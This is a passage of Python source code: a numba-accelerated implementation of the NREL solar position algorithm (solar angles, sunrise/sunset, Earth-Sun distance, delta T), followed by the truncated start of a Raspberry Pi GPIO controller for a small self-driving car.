+ HELIO_LONG_TABLE[2, row, 2] * jme)
)
l3 += (HELIO_LONG_TABLE[3, row, 0]
* np.cos(HELIO_LONG_TABLE[3, row, 1]
+ HELIO_LONG_TABLE[3, row, 2] * jme)
)
l4 += (HELIO_LONG_TABLE[4, row, 0]
* np.cos(HELIO_LONG_TABLE[4, row, 1]
+ HELIO_LONG_TABLE[4, row, 2] * jme)
)
l5 += (HELIO_LONG_TABLE[5, row, 0]
* np.cos(HELIO_LONG_TABLE[5, row, 1]
+ HELIO_LONG_TABLE[5, row, 2] * jme)
)
l_rad = (l0 + l1 * jme + l2 * jme**2 + l3 * jme**3 + l4 * jme**4 +
l5 * jme**5)/10**8
l = np.rad2deg(l_rad)
return l % 360
@jcompile('float64(float64)', nopython=True)
def heliocentric_latitude(jme):
b0 = 0.0
b1 = 0.0
for row in range(HELIO_LAT_TABLE.shape[1]):
b0 += (HELIO_LAT_TABLE[0, row, 0]
* np.cos(HELIO_LAT_TABLE[0, row, 1]
+ HELIO_LAT_TABLE[0, row, 2] * jme)
)
b1 += (HELIO_LAT_TABLE[1, row, 0]
* np.cos(HELIO_LAT_TABLE[1, row, 1]
+ HELIO_LAT_TABLE[1, row, 2] * jme)
)
b_rad = (b0 + b1 * jme)/10**8
b = np.rad2deg(b_rad)
return b
@jcompile('float64(float64)', nopython=True)
def heliocentric_radius_vector(jme):
r0 = 0.0
r1 = 0.0
r2 = 0.0
r3 = 0.0
r4 = 0.0
for row in range(HELIO_RADIUS_TABLE.shape[1]):
r0 += (HELIO_RADIUS_TABLE[0, row, 0]
* np.cos(HELIO_RADIUS_TABLE[0, row, 1]
+ HELIO_RADIUS_TABLE[0, row, 2] * jme)
)
r1 += (HELIO_RADIUS_TABLE[1, row, 0]
* np.cos(HELIO_RADIUS_TABLE[1, row, 1]
+ HELIO_RADIUS_TABLE[1, row, 2] * jme)
)
r2 += (HELIO_RADIUS_TABLE[2, row, 0]
* np.cos(HELIO_RADIUS_TABLE[2, row, 1]
+ HELIO_RADIUS_TABLE[2, row, 2] * jme)
)
r3 += (HELIO_RADIUS_TABLE[3, row, 0]
* np.cos(HELIO_RADIUS_TABLE[3, row, 1]
+ HELIO_RADIUS_TABLE[3, row, 2] * jme)
)
r4 += (HELIO_RADIUS_TABLE[4, row, 0]
* np.cos(HELIO_RADIUS_TABLE[4, row, 1]
+ HELIO_RADIUS_TABLE[4, row, 2] * jme)
)
r = (r0 + r1 * jme + r2 * jme**2 + r3 * jme**3 + r4 * jme**4)/10**8
return r
@jcompile('float64(float64)', nopython=True)
def geocentric_longitude(heliocentric_longitude):
theta = heliocentric_longitude + 180.0
return theta % 360
@jcompile('float64(float64)', nopython=True)
def geocentric_latitude(heliocentric_latitude):
beta = -1.0*heliocentric_latitude
return beta
@jcompile('float64(float64)', nopython=True)
def mean_elongation(julian_ephemeris_century):
x0 = (297.85036
+ 445267.111480 * julian_ephemeris_century
- 0.0019142 * julian_ephemeris_century**2
+ julian_ephemeris_century**3 / 189474)
return x0
@jcompile('float64(float64)', nopython=True)
def mean_anomaly_sun(julian_ephemeris_century):
x1 = (357.52772
+ 35999.050340 * julian_ephemeris_century
- 0.0001603 * julian_ephemeris_century**2
- julian_ephemeris_century**3 / 300000)
return x1
@jcompile('float64(float64)', nopython=True)
def mean_anomaly_moon(julian_ephemeris_century):
x2 = (134.96298
+ 477198.867398 * julian_ephemeris_century
+ 0.0086972 * julian_ephemeris_century**2
+ julian_ephemeris_century**3 / 56250)
return x2
@jcompile('float64(float64)', nopython=True)
def moon_argument_latitude(julian_ephemeris_century):
x3 = (93.27191
+ 483202.017538 * julian_ephemeris_century
- 0.0036825 * julian_ephemeris_century**2
+ julian_ephemeris_century**3 / 327270)
return x3
@jcompile('float64(float64)', nopython=True)
def moon_ascending_longitude(julian_ephemeris_century):
x4 = (125.04452
- 1934.136261 * julian_ephemeris_century
+ 0.0020708 * julian_ephemeris_century**2
+ julian_ephemeris_century**3 / 450000)
return x4
@jcompile('float64(float64, float64, float64, float64, float64, float64)',
nopython=True)
def longitude_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
delta_psi_sum = 0
for row in range(NUTATION_YTERM_ARRAY.shape[0]):
a = NUTATION_ABCD_ARRAY[row, 0]
b = NUTATION_ABCD_ARRAY[row, 1]
argsin = (NUTATION_YTERM_ARRAY[row, 0]*x0 +
NUTATION_YTERM_ARRAY[row, 1]*x1 +
NUTATION_YTERM_ARRAY[row, 2]*x2 +
NUTATION_YTERM_ARRAY[row, 3]*x3 +
NUTATION_YTERM_ARRAY[row, 4]*x4)
term = (a + b * julian_ephemeris_century) * np.sin(np.radians(argsin))
delta_psi_sum += term
delta_psi = delta_psi_sum*1.0/36000000
return delta_psi
@jcompile('float64(float64, float64, float64, float64, float64, float64)',
nopython=True)
def obliquity_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
delta_eps_sum = 0.0
for row in range(NUTATION_YTERM_ARRAY.shape[0]):
c = NUTATION_ABCD_ARRAY[row, 2]
d = NUTATION_ABCD_ARRAY[row, 3]
argcos = (NUTATION_YTERM_ARRAY[row, 0]*x0 +
NUTATION_YTERM_ARRAY[row, 1]*x1 +
NUTATION_YTERM_ARRAY[row, 2]*x2 +
NUTATION_YTERM_ARRAY[row, 3]*x3 +
NUTATION_YTERM_ARRAY[row, 4]*x4)
term = (c + d * julian_ephemeris_century) * np.cos(np.radians(argcos))
delta_eps_sum += term
delta_eps = delta_eps_sum*1.0/36000000
return delta_eps
@jcompile('float64(float64)', nopython=True)
def mean_ecliptic_obliquity(julian_ephemeris_millennium):
U = 1.0*julian_ephemeris_millennium/10
e0 = (84381.448 - 4680.93 * U - 1.55 * U**2
+ 1999.25 * U**3 - 51.38 * U**4 - 249.67 * U**5
- 39.05 * U**6 + 7.12 * U**7 + 27.87 * U**8
+ 5.79 * U**9 + 2.45 * U**10)
return e0
@jcompile('float64(float64, float64)', nopython=True)
def true_ecliptic_obliquity(mean_ecliptic_obliquity, obliquity_nutation):
e0 = mean_ecliptic_obliquity
deleps = obliquity_nutation
e = e0*1.0/3600 + deleps
return e
@jcompile('float64(float64)', nopython=True)
def aberration_correction(earth_radius_vector):
deltau = -20.4898 / (3600 * earth_radius_vector)
return deltau
@jcompile('float64(float64, float64, float64)', nopython=True)
def apparent_sun_longitude(geocentric_longitude, longitude_nutation,
aberration_correction):
lamd = geocentric_longitude + longitude_nutation + aberration_correction
return lamd
@jcompile('float64(float64, float64)', nopython=True)
def mean_sidereal_time(julian_day, julian_century):
v0 = (280.46061837 + 360.98564736629 * (julian_day - 2451545)
+ 0.000387933 * julian_century**2 - julian_century**3 / 38710000)
return v0 % 360.0
@jcompile('float64(float64, float64, float64)', nopython=True)
def apparent_sidereal_time(mean_sidereal_time, longitude_nutation,
true_ecliptic_obliquity):
v = mean_sidereal_time + longitude_nutation * np.cos(
np.radians(true_ecliptic_obliquity))
return v
@jcompile('float64(float64, float64, float64)', nopython=True)
def geocentric_sun_right_ascension(apparent_sun_longitude,
true_ecliptic_obliquity,
geocentric_latitude):
num = (np.sin(np.radians(apparent_sun_longitude))
* np.cos(np.radians(true_ecliptic_obliquity))
- np.tan(np.radians(geocentric_latitude))
* np.sin(np.radians(true_ecliptic_obliquity)))
alpha = np.degrees(np.arctan2(num, np.cos(
np.radians(apparent_sun_longitude))))
return alpha % 360
@jcompile('float64(float64, float64, float64)', nopython=True)
def geocentric_sun_declination(apparent_sun_longitude, true_ecliptic_obliquity,
geocentric_latitude):
delta = np.degrees(np.arcsin(np.sin(np.radians(geocentric_latitude)) *
np.cos(np.radians(true_ecliptic_obliquity)) +
np.cos(np.radians(geocentric_latitude)) *
np.sin(np.radians(true_ecliptic_obliquity)) *
np.sin(np.radians(apparent_sun_longitude))))
return delta
@jcompile('float64(float64, float64, float64)', nopython=True)
def local_hour_angle(apparent_sidereal_time, observer_longitude,
sun_right_ascension):
"""Measured westward from south"""
H = apparent_sidereal_time + observer_longitude - sun_right_ascension
return H % 360
@jcompile('float64(float64)', nopython=True)
def equatorial_horizontal_parallax(earth_radius_vector):
xi = 8.794 / (3600 * earth_radius_vector)
return xi
@jcompile('float64(float64)', nopython=True)
def uterm(observer_latitude):
u = np.arctan(0.99664719 * np.tan(np.radians(observer_latitude)))
return u
@jcompile('float64(float64, float64, float64)', nopython=True)
def xterm(u, observer_latitude, observer_elevation):
x = (np.cos(u) + observer_elevation / 6378140
* np.cos(np.radians(observer_latitude)))
return x
@jcompile('float64(float64, float64, float64)', nopython=True)
def yterm(u, observer_latitude, observer_elevation):
y = (0.99664719 * np.sin(u) + observer_elevation / 6378140
* np.sin(np.radians(observer_latitude)))
return y
@jcompile('float64(float64, float64,float64, float64)', nopython=True)
def parallax_sun_right_ascension(xterm, equatorial_horizontal_parallax,
local_hour_angle, geocentric_sun_declination):
num = (-xterm * np.sin(np.radians(equatorial_horizontal_parallax))
* np.sin(np.radians(local_hour_angle)))
denom = (np.cos(np.radians(geocentric_sun_declination))
- xterm * np.sin(np.radians(equatorial_horizontal_parallax))
* np.cos(np.radians(local_hour_angle)))
delta_alpha = np.degrees(np.arctan2(num, denom))
return delta_alpha
@jcompile('float64(float64, float64)', nopython=True)
def topocentric_sun_right_ascension(geocentric_sun_right_ascension,
parallax_sun_right_ascension):
alpha_prime = geocentric_sun_right_ascension + parallax_sun_right_ascension
return alpha_prime
@jcompile('float64(float64, float64, float64, float64, float64, float64)',
nopython=True)
def topocentric_sun_declination(geocentric_sun_declination, xterm, yterm,
equatorial_horizontal_parallax,
parallax_sun_right_ascension,
local_hour_angle):
num = ((np.sin(np.radians(geocentric_sun_declination)) - yterm
* np.sin(np.radians(equatorial_horizontal_parallax)))
* np.cos(np.radians(parallax_sun_right_ascension)))
denom = (np.cos(np.radians(geocentric_sun_declination)) - xterm
* np.sin(np.radians(equatorial_horizontal_parallax))
* np.cos(np.radians(local_hour_angle)))
delta = np.degrees(np.arctan2(num, denom))
return delta
@jcompile('float64(float64, float64)', nopython=True)
def topocentric_local_hour_angle(local_hour_angle,
parallax_sun_right_ascension):
H_prime = local_hour_angle - parallax_sun_right_ascension
return H_prime
@jcompile('float64(float64, float64, float64)', nopython=True)
def topocentric_elevation_angle_without_atmosphere(observer_latitude,
topocentric_sun_declination,
topocentric_local_hour_angle
):
e0 = np.degrees(np.arcsin(
np.sin(np.radians(observer_latitude))
* np.sin(np.radians(topocentric_sun_declination))
+ np.cos(np.radians(observer_latitude))
* np.cos(np.radians(topocentric_sun_declination))
* np.cos(np.radians(topocentric_local_hour_angle))))
return e0
@jcompile('float64(float64, float64, float64, float64)', nopython=True)
def atmospheric_refraction_correction(local_pressure, local_temp,
topocentric_elevation_angle_wo_atmosphere,
atmos_refract):
# switch sets delta_e when the sun is below the horizon
switch = topocentric_elevation_angle_wo_atmosphere >= -1.0 * (
0.26667 + atmos_refract)
delta_e = ((local_pressure / 1010.0) * (283.0 / (273 + local_temp))
* 1.02 / (60 * np.tan(np.radians(
topocentric_elevation_angle_wo_atmosphere
+ 10.3 / (topocentric_elevation_angle_wo_atmosphere
+ 5.11))))) * switch
return delta_e
@jcompile('float64(float64, float64)', nopython=True)
def topocentric_elevation_angle(topocentric_elevation_angle_without_atmosphere,
atmospheric_refraction_correction):
e = (topocentric_elevation_angle_without_atmosphere
+ atmospheric_refraction_correction)
return e
@jcompile('float64(float64)', nopython=True)
def topocentric_zenith_angle(topocentric_elevation_angle):
theta = 90 - topocentric_elevation_angle
return theta
@jcompile('float64(float64, float64, float64)', nopython=True)
def topocentric_astronomers_azimuth(topocentric_local_hour_angle,
topocentric_sun_declination,
observer_latitude):
num = np.sin(np.radians(topocentric_local_hour_angle))
denom = (np.cos(np.radians(topocentric_local_hour_angle))
* np.sin(np.radians(observer_latitude))
- np.tan(np.radians(topocentric_sun_declination))
* np.cos(np.radians(observer_latitude)))
gamma = np.degrees(np.arctan2(num, denom))
return gamma % 360
@jcompile('float64(float64)', nopython=True)
def topocentric_azimuth_angle(topocentric_astronomers_azimuth):
phi = topocentric_astronomers_azimuth + 180
return phi % 360
@jcompile('float64(float64)', nopython=True)
def sun_mean_longitude(julian_ephemeris_millennium):
M = (280.4664567 + 360007.6982779 * julian_ephemeris_millennium
+ 0.03032028 * julian_ephemeris_millennium**2
+ julian_ephemeris_millennium**3 / 49931
- julian_ephemeris_millennium**4 / 15300
- julian_ephemeris_millennium**5 / 2000000)
return M
@jcompile('float64(float64, float64, float64, float64)', nopython=True)
def equation_of_time(sun_mean_longitude, geocentric_sun_right_ascension,
longitude_nutation, true_ecliptic_obliquity):
E = (sun_mean_longitude - 0.0057183 - geocentric_sun_right_ascension +
longitude_nutation * np.cos(np.radians(true_ecliptic_obliquity)))
# limit between 0 and 360
E = E % 360
# convert to minutes
E *= 4
greater = E > 20
less = E < -20
other = (E <= 20) & (E >= -20)
E = greater * (E - 1440) + less * (E + 1440) + other * E
return E
@jcompile('void(float64[:], float64[:], float64[:,:])', nopython=True,
nogil=True)
def solar_position_loop(unixtime, loc_args, out):
"""Loop through the time array and calculate the solar position"""
lat = loc_args[0]
lon = loc_args[1]
elev = loc_args[2]
pressure = loc_args[3]
temp = loc_args[4]
delta_t = loc_args[5]
atmos_refract = loc_args[6]
sst = loc_args[7]
esd = loc_args[8]
for i in range(unixtime.shape[0]):
utime = unixtime[i]
jd = julian_day(utime)
jde = julian_ephemeris_day(jd, delta_t)
jc = julian_century(jd)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
if esd:
out[0, i] = R
continue
L = heliocentric_longitude(jme)
B = heliocentric_latitude(jme)
Theta = geocentric_longitude(L)
beta = geocentric_latitude(B)
x0 = mean_elongation(jce)
x1 = mean_anomaly_sun(jce)
x2 = mean_anomaly_moon(jce)
x3 = moon_argument_latitude(jce)
x4 = moon_ascending_longitude(jce)
delta_psi = longitude_nutation(jce, x0, x1, x2, x3, x4)
delta_epsilon = obliquity_nutation(jce, x0, x1, x2, x3, x4)
epsilon0 = mean_ecliptic_obliquity(jme)
epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
delta_tau = aberration_correction(R)
lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
v0 = mean_sidereal_time(jd, jc)
v = apparent_sidereal_time(v0, delta_psi, epsilon)
alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
delta = geocentric_sun_declination(lamd, epsilon, beta)
if sst:
out[0, i] = v
out[1, i] = alpha
out[2, i] = delta
continue
m = sun_mean_longitude(jme)
eot = equation_of_time(m, alpha, delta_psi, epsilon)
H = local_hour_angle(v, lon, alpha)
xi = equatorial_horizontal_parallax(R)
u = uterm(lat)
x = xterm(u, lat, elev)
y = yterm(u, lat, elev)
delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha,
H)
H_prime = topocentric_local_hour_angle(H, delta_alpha)
e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
H_prime)
delta_e = atmospheric_refraction_correction(pressure, temp, e0,
atmos_refract)
e = topocentric_elevation_angle(e0, delta_e)
theta = topocentric_zenith_angle(e)
theta0 = topocentric_zenith_angle(e0)
gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
phi = topocentric_azimuth_angle(gamma)
out[0, i] = theta
out[1, i] = theta0
out[2, i] = e
out[3, i] = e0
out[4, i] = phi
out[5, i] = eot
def solar_position_numba(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, numthreads, sst=False, esd=False):
"""Calculate the solar position using the numba compiled functions
and multiple threads. Very slow if functions are not numba compiled.
"""
# these args are the same for each thread
loc_args = np.array([lat, lon, elev, pressure, temp, delta_t,
atmos_refract, sst, esd])
# construct dims x ulength array to put the results in
ulength = unixtime.shape[0]
if sst:
dims = 3
elif esd:
dims = 1
else:
dims = 6
result = np.empty((dims, ulength), dtype=np.float64)
if unixtime.dtype != np.float64:
unixtime = unixtime.astype(np.float64)
if ulength < numthreads:
warnings.warn('The number of threads is more than the length of '
'the time array. Only using %s threads.'.format(ulength))
numthreads = ulength
if numthreads <= 1:
solar_position_loop(unixtime, loc_args, result)
return result
# split the input and output arrays into numthreads chunks
split0 = np.array_split(unixtime, numthreads)
split2 = np.array_split(result, numthreads, axis=1)
chunks = [[a0, loc_args, split2[i]] for i, a0 in enumerate(split0)]
# Spawn one thread per chunk
threads = [threading.Thread(target=solar_position_loop, args=chunk)
for chunk in chunks]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return result
def solar_position_numpy(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, numthreads, sst=False, esd=False):
"""Calculate the solar position assuming unixtime is a numpy array. Note
this function will not work if the solar position functions were
compiled with numba.
"""
jd = julian_day(unixtime)
jde = julian_ephemeris_day(jd, delta_t)
jc = julian_century(jd)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
if esd:
return (R, )
L = heliocentric_longitude(jme)
B = heliocentric_latitude(jme)
Theta = geocentric_longitude(L)
beta = geocentric_latitude(B)
x0 = mean_elongation(jce)
x1 = mean_anomaly_sun(jce)
x2 = mean_anomaly_moon(jce)
x3 = moon_argument_latitude(jce)
x4 = moon_ascending_longitude(jce)
delta_psi = longitude_nutation(jce, x0, x1, x2, x3, x4)
delta_epsilon = obliquity_nutation(jce, x0, x1, x2, x3, x4)
epsilon0 = mean_ecliptic_obliquity(jme)
epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
delta_tau = aberration_correction(R)
lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
v0 = mean_sidereal_time(jd, jc)
v = apparent_sidereal_time(v0, delta_psi, epsilon)
alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
delta = geocentric_sun_declination(lamd, epsilon, beta)
if sst:
return v, alpha, delta
m = sun_mean_longitude(jme)
eot = equation_of_time(m, alpha, delta_psi, epsilon)
H = local_hour_angle(v, lon, alpha)
xi = equatorial_horizontal_parallax(R)
u = uterm(lat)
x = xterm(u, lat, elev)
y = yterm(u, lat, elev)
delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha, H)
H_prime = topocentric_local_hour_angle(H, delta_alpha)
e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
H_prime)
delta_e = atmospheric_refraction_correction(pressure, temp, e0,
atmos_refract)
e = topocentric_elevation_angle(e0, delta_e)
theta = topocentric_zenith_angle(e)
theta0 = topocentric_zenith_angle(e0)
gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
phi = topocentric_azimuth_angle(gamma)
return theta, theta0, e, e0, phi, eot
def solar_position(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, numthreads=8, sst=False, esd=False):
"""
Calculate the solar position using the
NREL SPA algorithm described in [1].
If numba is installed, the functions can be compiled
and the code runs quickly. If not, the functions
still evaluate but use numpy instead.
Parameters
----------
unixtime : numpy array
Array of unix/epoch timestamps to calculate solar position for.
Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
lat : float
Latitude to calculate solar position for
lon : float
Longitude to calculate solar position for
elev : float
Elevation of location in meters
pressure : int or float
avg. yearly pressure at location in millibars;
used for atmospheric correction
temp : int or float
avg. yearly temperature at location in
degrees C; used for atmospheric correction
delta_t : float, optional
If delta_t is None, uses spa.calculate_deltat
using time.year and time.month from pandas.DatetimeIndex.
For most simulations specifing delta_t is sufficient.
Difference between terrestrial time and UT1.
*Note: delta_t = None will break code using nrel_numba,
this will be fixed in a future version.
By default, use USNO historical data and predictions
atmos_refrac : float, optional
The approximate atmospheric refraction (in degrees)
at sunrise and sunset.
numthreads: int, optional, default 8
Number of threads to use for computation if numba>=0.17
is installed.
sst : bool, default False
If True, return only data needed for sunrise, sunset, and transit
calculations.
esd : bool, default False
If True, return only Earth-Sun distance in AU
Returns
-------
Numpy Array with elements:
apparent zenith,
zenith,
elevation,
apparent_elevation,
azimuth,
equation_of_time
References
----------
[1] I. Reda and A. Andreas, Solar position algorithm for solar radiation
applications. Solar Energy, vol. 76, no. 5, pp. 577-589, 2004.
[2] I. Reda and A. Andreas, Corrigendum to Solar position algorithm for
solar radiation applications. Solar Energy, vol. 81, no. 6, p. 838, 2007.
"""
if USE_NUMBA:
do_calc = solar_position_numba
else:
do_calc = solar_position_numpy
result = do_calc(unixtime, lat, lon, elev, pressure,
temp, delta_t, atmos_refract, numthreads,
sst, esd)
if not isinstance(result, np.ndarray):
try:
result = np.array(result)
except Exception:
pass
return result
def transit_sunrise_sunset(dates, lat, lon, delta_t, numthreads):
"""
Calculate the sun transit, sunrise, and sunset
for a set of dates at a given location.
Parameters
----------
dates : array
Numpy array of ints/floats corresponding to the Unix time
for the dates of interest, must be midnight UTC (00:00+00:00)
on the day of interest.
lat : float
Latitude of location to perform calculation for
lon : float
Longitude of location
delta_t : float
Difference between terrestrial time and UT. USNO has tables.
numthreads : int
Number to threads to use for calculation (if using numba)
Returns
-------
tuple : (transit, sunrise, sunset) localized to UTC
"""
if ((dates % 86400) != 0.0).any():
raise ValueError('Input dates must be at 00:00 UTC')
utday = (dates // 86400) * 86400
ttday0 = utday - delta_t
ttdayn1 = ttday0 - 86400
ttdayp1 = ttday0 + 86400
# index 0 is v, 1 is alpha, 2 is delta
utday_res = solar_position(utday, 0, 0, 0, 0, 0, delta_t,
0, numthreads, sst=True)
v = utday_res[0]
ttday0_res = solar_position(ttday0, 0, 0, 0, 0, 0, delta_t,
0, numthreads, sst=True)
ttdayn1_res = solar_position(ttdayn1, 0, 0, 0, 0, 0, delta_t,
0, numthreads, sst=True)
ttdayp1_res = solar_position(ttdayp1, 0, 0, 0, 0, 0, delta_t,
0, numthreads, sst=True)
m0 = (ttday0_res[1] - lon - v) / 360
cos_arg = ((np.sin(np.radians(-0.8333)) - np.sin(np.radians(lat))
* np.sin(np.radians(ttday0_res[2]))) /
(np.cos(np.radians(lat)) * np.cos(np.radians(ttday0_res[2]))))
cos_arg[abs(cos_arg) > 1] = np.nan
H0 = np.degrees(np.arccos(cos_arg)) % 180
m = np.empty((3, len(utday)))
m[0] = m0 % 1
m[1] = (m[0] - H0 / 360)
m[2] = (m[0] + H0 / 360)
# need to account for fractions of day that may be the next or previous
# day in UTC
add_a_day = m[2] >= 1
sub_a_day = m[1] < 0
m[1] = m[1] % 1
m[2] = m[2] % 1
vs = v + 360.985647 * m
n = m + delta_t / 86400
a = ttday0_res[1] - ttdayn1_res[1]
a[abs(a) > 2] = a[abs(a) > 2] % 1
ap = ttday0_res[2] - ttdayn1_res[2]
ap[abs(ap) > 2] = ap[abs(ap) > 2] % 1
b = ttdayp1_res[1] - ttday0_res[1]
b[abs(b) > 2] = b[abs(b) > 2] % 1
bp = ttdayp1_res[2] - ttday0_res[2]
bp[abs(bp) > 2] = bp[abs(bp) > 2] % 1
c = b - a
cp = bp - ap
alpha_prime = ttday0_res[1] + (n * (a + b + c * n)) / 2
delta_prime = ttday0_res[2] + (n * (ap + bp + cp * n)) / 2
Hp = (vs + lon - alpha_prime) % 360
Hp[Hp >= 180] = Hp[Hp >= 180] - 360
h = np.degrees(np.arcsin(np.sin(np.radians(lat)) *
np.sin(np.radians(delta_prime)) +
np.cos(np.radians(lat)) *
np.cos(np.radians(delta_prime))
* np.cos(np.radians(Hp))))
T = (m[0] - Hp[0] / 360) * 86400
R = (m[1] + (h[1] + 0.8333) / (360 * np.cos(np.radians(delta_prime[1])) *
np.cos(np.radians(lat)) *
np.sin(np.radians(Hp[1])))) * 86400
S = (m[2] + (h[2] + 0.8333) / (360 * np.cos(np.radians(delta_prime[2])) *
np.cos(np.radians(lat)) *
np.sin(np.radians(Hp[2])))) * 86400
S[add_a_day] += 86400
R[sub_a_day] -= 86400
transit = T + utday
sunrise = R + utday
sunset = S + utday
return transit, sunrise, sunset
def earthsun_distance(unixtime, delta_t, numthreads):
"""
Calculates the distance from the earth to the sun using the
NREL SPA algorithm described in [1].
Parameters
----------
unixtime : numpy array
Array of unix/epoch timestamps to calculate solar position for.
Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
delta_t : float
Difference between terrestrial time and UT. USNO has tables.
numthreads : int
Number to threads to use for calculation (if using numba)
Returns
-------
R : array
Earth-Sun distance in AU.
References
----------
[1] Reda, I., Andreas, A., 2003. Solar position algorithm for solar
radiation applications. Technical report: NREL/TP-560- 34302. Golden,
USA, http://www.nrel.gov.
"""
R = solar_position(unixtime, 0, 0, 0, 0, 0, delta_t,
0, numthreads, esd=True)[0]
return R
def calculate_deltat(year, month):
"""Calculate the difference between Terrestrial Dynamical Time (TD)
and Universal Time (UT).
Note: This function is not yet compatible for calculations using
Numba.
Equations taken from http://eclipse.gsfc.nasa.gov/SEcat5/deltatpoly.html
"""
plw = 'Deltat is unknown for years before -1999 and after 3000. ' \
'Delta values will be calculated, but the calculations ' \
'are not intended to be used for these years.'
try:
if np.any((year > 3000) | (year < -1999)):
warnings.warn(plw)
except ValueError:
if (year > 3000) | (year < -1999):
warnings.warn(plw)
except TypeError:
return 0
y = year + (month - 0.5)/12
deltat = np.where(year < -500,
-20+32*((y-1820)/100)**2, 0)
deltat = np.where((-500 <= year) & (year < 500),
10583.6-1014.41*(y/100)
+ 33.78311*(y/100)**2
- 5.952053*(y/100)**3
- 0.1798452*(y/100)**4
+ 0.022174192*(y/100)**5
+ 0.0090316521*(y/100)**6, deltat)
deltat = np.where((500 <= year) & (year < 1600),
1574.2-556.01*((y-1000)/100)
+ 71.23472*((y-1000)/100)**2
+ 0.319781*((y-1000)/100)**3
- 0.8503463*((y-1000)/100)**4
- 0.005050998*((y-1000)/100)**5
+ 0.0083572073*((y-1000)/100)**6, deltat)
deltat = np.where((1600 <= year) & (year < 1700),
120-0.9808*(y-1600)
- 0.01532*(y-1600)**2
+ (y-1600)**3/7129, deltat)
deltat = np.where((1700 <= year) & (year < 1800),
8.83+0.1603*(y-1700)
- 0.0059285*(y-1700)**2
+ 0.00013336*(y-1700)**3
- (y-1700)**4/1174000, deltat)
deltat = np.where((1800 <= year) & (year < 1860),
13.72-0.332447*(y-1800)
+ 0.0068612*(y-1800)**2
+ 0.0041116*(y-1800)**3
- 0.00037436*(y-1800)**4
+ 0.0000121272*(y-1800)**5
- 0.0000001699*(y-1800)**6
+ 0.000000000875*(y-1800)**7, deltat)
deltat = np.where((1860 <= year) & (year < 1900),
7.62+0.5737*(y-1860)
- 0.251754*(y-1860)**2
+ 0.01680668*(y-1860)**3
- 0.0004473624*(y-1860)**4
+ (y-1860)**5/233174, deltat)
deltat = np.where((1900 <= year) & (year < 1920),
-2.79+1.494119*(y-1900)
- 0.0598939*(y-1900)**2
+ 0.0061966*(y-1900)**3
- 0.000197*(y-1900)**4, deltat)
deltat = np.where((1920 <= year) & (year < 1941),
21.20+0.84493*(y-1920)
- 0.076100*(y-1920)**2
+ 0.0020936*(y-1920)**3, deltat)
deltat = np.where((1941 <= year) & (year < 1961),
29.07+0.407*(y-1950)
- (y-1950)**2/233
+ (y-1950)**3/2547, deltat)
deltat = np.where((1961 <= year) & (year < 1986),
45.45+1.067*(y-1975)
- (y-1975)**2/260
- (y-1975)**3/718, deltat)
deltat = np.where((1986 <= year) & (year < 2005),
63.86+0.3345*(y-2000)
- 0.060374*(y-2000)**2
+ 0.0017275*(y-2000)**3
+ 0.000651814*(y-2000)**4
+ 0.00002373599*(y-2000)**5, deltat)
deltat = np.where((2005 <= year) & (year < 2050),
62.92+0.32217*(y-2000)
+ 0.005589*(y-2000)**2, deltat)
deltat = np.where((2050 <= year) & (year < 2150),
-20+32*((y-1820)/100)**2
- 0.5628*(2150-y), deltat)
deltat = np.where(year >= 2150,
-20+32*((y-1820)/100)**2, deltat)
deltat = deltat.item() if np.isscalar(year) & np.isscalar(month)\
else deltat
return deltat
|
controller.py
|
# LD_PRELOAD=/usr/lib/arm-linux-gnueabihf/libatomic.so.1.2.0 python3 controls.py
import RPi.GPIO as GPIO
import time
import prefs
import os
import errno
import shutil
import threading
import sys
#import cv2
#import numpy as np
def log(*a):
#print("[CONT]", a)
pass
#import sys
#sys.path.append("../self_drive")
#import drive
AUTOPILOT = False
sys.path.append("../self_drive")
import image_processing
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
# Forawrd / Backward Pins
in1 = 27
in2 = 17
en = 22
temp1=1
# Left / Right Pins
tin1 = 23
tin2 = 24
ten = 25
steering_angle = 75
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(en,GPIO.OUT)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
p=GPIO.PWM(en,1000)
p.start(0)
GPIO.setup(tin1,GPIO.OUT)
GPIO.setup(tin2,GPIO.OUT)
GPIO.setup(ten,GPIO.OUT)
GPIO.output(tin1,GPIO.LOW)
GPIO.output(tin2,GPIO.LOW)
tp=GPIO.PWM(ten,1000)
tp.start(0)
"""
# GPIO Pins don't provide enough current to drive Fan
FAN_PIN = 12
GPIO.setup(FAN_PIN,GPIO.OUT)
GPIO.output(FAN_PIN,GPIO.HIGH)
"""
BUZZER_PIN = 12
GPIO.setup(BUZZER_PIN,GPIO.OUT)
GPIO.output(BUZZER_PIN, GPIO.LOW)
def BACKGROUND_BUZZER_PATTERN(pattern_total, delay_time=0.5):
for pattern in pattern_total:
GPIO.output(BUZZER_PIN, GPIO.LOW)
if " " != str(pattern):
